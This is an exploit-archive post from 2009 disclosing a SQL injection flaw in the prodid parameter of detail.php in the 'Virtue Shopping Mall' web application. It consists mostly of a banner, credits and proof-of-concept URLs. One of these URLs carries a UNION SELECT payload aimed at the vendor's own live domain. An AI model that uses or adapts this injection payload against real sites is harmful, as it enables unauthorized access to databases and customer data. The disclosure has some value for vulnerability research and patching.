Home / os / win10

vsm-sql.txt

Posted on 06 August 2009

/*

_____       _ ___        __
| ____|_   _(_)        / /_ _ _   _
|  _|   / / | |  / / / _` | | | |
| |___  V /| | |  V  V / (_| | |_| |
|_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
|___/
_____
|_   _|__  __ _ _ __ ___
| |/ _ / _` | '_ ` _ \n| |  __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|

Virtue Shopping Mall (detail.php prodid) SQL Injection Vulnerability

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://www.virtuenetz.com/shopping_mall.php

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit SQL:

- Vulnerable code in detail.php (prodid).

- Poc:
http://127.0.0.1/detail.php?prodid=[SQL]
http://www.virtuenetz.com/mall/detail.php?prodid=null+union+select+1,2,3,4,5--

 

TOP

Malware :

Exploits :